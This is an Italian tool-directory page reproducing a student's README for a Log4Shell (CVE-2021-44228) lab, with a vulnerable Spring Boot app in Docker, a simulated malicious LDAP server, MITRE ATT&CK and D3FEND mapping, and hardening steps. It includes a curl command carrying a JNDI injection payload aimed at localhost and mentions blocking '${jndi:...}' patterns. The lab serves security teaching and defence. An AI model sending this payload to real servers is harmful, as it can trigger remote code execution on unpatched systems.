Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4shell-homework9 — Demo dell'exploit Log4Shell (CVE-2021-44228) per SEAS 8405. Include un'app Spring Boot vulnerabile, un server LDAP fittizio, configurazione Docker, mappatura MITRE, risposta agli incidenti e una registrazione completa dello schermo. | Kitploit
Strumenti/GitHubGitHub/serpilrivas/log4shell-homework9
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneRisposta agli IncidentiLab e Pratica
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Demo dell'exploit Log4Shell (CVE-2021-44228) per SEAS 8405. Include un'app Spring Boot vulnerabile, un server LDAP fittizio, configurazione Docker, mappatura MITRE, risposta agli incidenti e una registrazione completa dello schermo.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 anno faNon ancora revisionato

Compito 9 – Proteggere i sistemi dagli exploit Log4Shell

Panoramica

Questo progetto dimostra lo sfruttamento e la mitigazione della vulnerabilità Log4Shell (CVE-2021-44228) utilizzando un'applicazione web Java containerizzata con Log4j 2.14.1 vulnerabile. La configurazione include anche un server LDAP dannoso simulato per dimostrare il percorso di attacco di iniezione JNDI.

Dopo lo sfruttamento, il sistema viene indurito aggiornando Log4j, validando l'input e applicando le raccomandazioni MITRE D3FEND e ATT&CK.


📁 Struttura delle cartelle

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

🚀 Come eseguire

1. Costruisci l'app Java (con Log4j vulnerabile)

root@kitploit:~
docker build -t vulnerable-app .

2. Esegui l'app con Docker Compose

root@kitploit:~
docker-compose up

L'app sarà in esecuzione su:
http://localhost:8080

3. Avvia il server LDAP fittizio (in un nuovo terminale)

root@kitploit:~
python3 ldap_server.py

4. Simula un exploit

Invia una richiesta come questa all'app:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

Il server LDAP dovrebbe ricevere la richiesta (questo simula l'exploit JNDI).


🛡️ Come viene indurito

Dopo aver dimostrato l'attacco, il sistema è stato protetto:

  • Aggiornamento di Log4j alla versione 2.17.0
  • Validazione dell'input (blocco dei pattern ${jndi:...})
  • Disabilitazione dei lookup dei messaggi nella configurazione
  • Isolamento Docker per limitare l'ambito
  • Applicazione delle tecniche MITRE D3FEND e ATT&CK

🗺️ Mappatura MITRE

MITRE ATT&CK:

  • T1190: Sfruttamento di applicazioni esposte al pubblico
  • T1210: Sfruttamento di servizi remoti

MITRE D3FEND:

  • D3-IA: Validazione dell'input
  • D3-HI: Rilevamento delle intrusioni basato su host
  • D3-DA: Disabilitazione delle funzionalità non sicure

📄 Relazione

Vedere mitigation_report.pdf per:

  • Architettura del sistema prima/dopo
  • Spiegazione di Log4Shell
  • Strategia di mitigazione
  • Piano di risposta agli incidenti

🎥 Registrazione dello schermo

Se il video non è caricato direttamente, è disponibile al link nella relazione.


✍️ Autore

Serpil Rivas
SEAS 8405 – Architetture di cybersecurity
Maggio 2025

Scarica lo strumento